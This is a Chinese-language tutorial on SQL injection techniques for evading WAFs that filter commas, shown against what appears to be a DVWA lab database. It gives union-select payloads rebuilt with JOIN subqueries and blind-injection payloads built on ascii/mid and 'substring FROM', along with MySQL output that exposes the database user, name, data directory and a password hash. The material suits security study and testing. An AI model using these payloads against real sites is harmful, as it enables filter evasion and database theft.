SQL注入技巧之显注与盲注中过滤逗号绕过详析
2024-11-04 20:03:13数据库技术 主机评测网
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注中过滤逗号绕过的相关资料,文中通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
前言
sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧
1.联合查询显注绕过逗号
在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句中包含了多个逗号,如果有WAF拦截了逗号时,我们的联合查询不能用了。
绕过
在显示位上替换为常见的注入变量或其它语句
1 2 3 4 5 | union select 1,2,3; union select * from (( select 1)A join ( select 2)B join ( select 3)C); union select * from (( select 1)A join ( select 2)B join ( select group_concat( user (), ' ' , database (), ' ' ,@@datadir))C); |
在数据库中演示联合查询
UNION开始是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截
1 2 3 4 5 6 7 8 | mysql> select user_id, user , password from users union select 1,2,3; + ---------+-------+----------------------------------+ | user_id | user | password | + ---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 1 | 2 | 3 | + ---------+-------+----------------------------------+ 2 rows in set (0.04 sec) |
不出现逗号,使用Join来注入
1 2 3 4 5 6 7 8 | mysql> select user_id, user , password from users union select * from (( select 1)A join ( select 2)B join ( select 3)C); + ---------+-------+----------------------------------+ | user_id | user | password | + ---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 1 | 2 | 3 | + ---------+-------+----------------------------------+ 2 rows in set (0.05 sec) |
查询我们想要的数据
1 2 3 4 5 6 7 8 | mysql> select user_id, user , password from users union select * from (( select 1)A join ( select 2)B join ( select group_concat( user (), ' ' , database (), ' ' ,@@datadir))C);; + ---------+-------+-------------------------------------------------+ | user_id | user | password | + ---------+-------+-------------------------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 1 | 2 | root@192.168.228.1 dvwa c:/phpStudy/MySQL/data/ | + ---------+-------+-------------------------------------------------+ 2 rows in set (0.08 sec) |
2.盲注中逗号绕过
MID 和substr 函数用于从文本字段中提取字符
1 2 3 4 5 6 7 | mysql> select mid( user (),1,2); + -----------------+ | mid( user (),1,2) | + -----------------+ | ro | + -----------------+ 1 row in set (0.04 sec) |
查询数据库用户名第一个字符的ascii码
1 2 3 4 5 6 7 8 | mysql> select user_id, user , password from users union select ascii(mid( user (),1,2)),2,3; + ---------+-------+----------------------------------+ | user_id | user | password | + ---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 114 | 2 | 3 | + ---------+-------+----------------------------------+ 2 rows in set (0.05 sec) |
盲注,通过猜ascii值
1 2 3 4 5 6 7 8 9 10 | mysql> select user_id, user , password from users where user_id=1 and ( select ascii(mid( user (),1,2))=115) ; Empty set mysql> select user_id, user , password from users where user_id=1 and ( select ascii(mid( user (),1,2))=114) ; + ---------+-------+----------------------------------+ | user_id | user | password | + ---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | + ---------+-------+----------------------------------+ 1 row in set (0.04 sec) |
逗号绕过SUBTTRING 函数
substring(str FROM pos)
从字符串str的起始位置pos 返回一个子串
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | mysql> select substring ( 'hello' from 1); + ---------------------------+ | substring ( 'hello' from 1) | + ---------------------------+ | hello | + ---------------------------+ 1 row in set (0.04 sec) mysql> select substring ( 'hello' from 2); + ---------------------------+ | substring ( 'hello' from 2) | + ---------------------------+ | ello | + ---------------------------+ 1 row in set (0.03 sec) |
注入
1 2 3 4 5 6 7 8 9 10 11 | mysql> select user_id, user , password from users where user_id=1 and (ascii( substring ( user () from 2))=114) ; Empty set // substring ( user () from 2)为o //o的ascii为111, mysql> select user_id, user , password from users where user_id=1 and (ascii( substring ( user () from 2))=111) ; + ---------+-------+----------------------------------+ | user_id | user | password | + ---------+-------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | + ---------+-------+----------------------------------+ 1 row in set (0.03 sec) |
总结
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对的支持。
原文链接:http://www.cnblogs.com/hackxf/p/9490534.html
赞一个! ()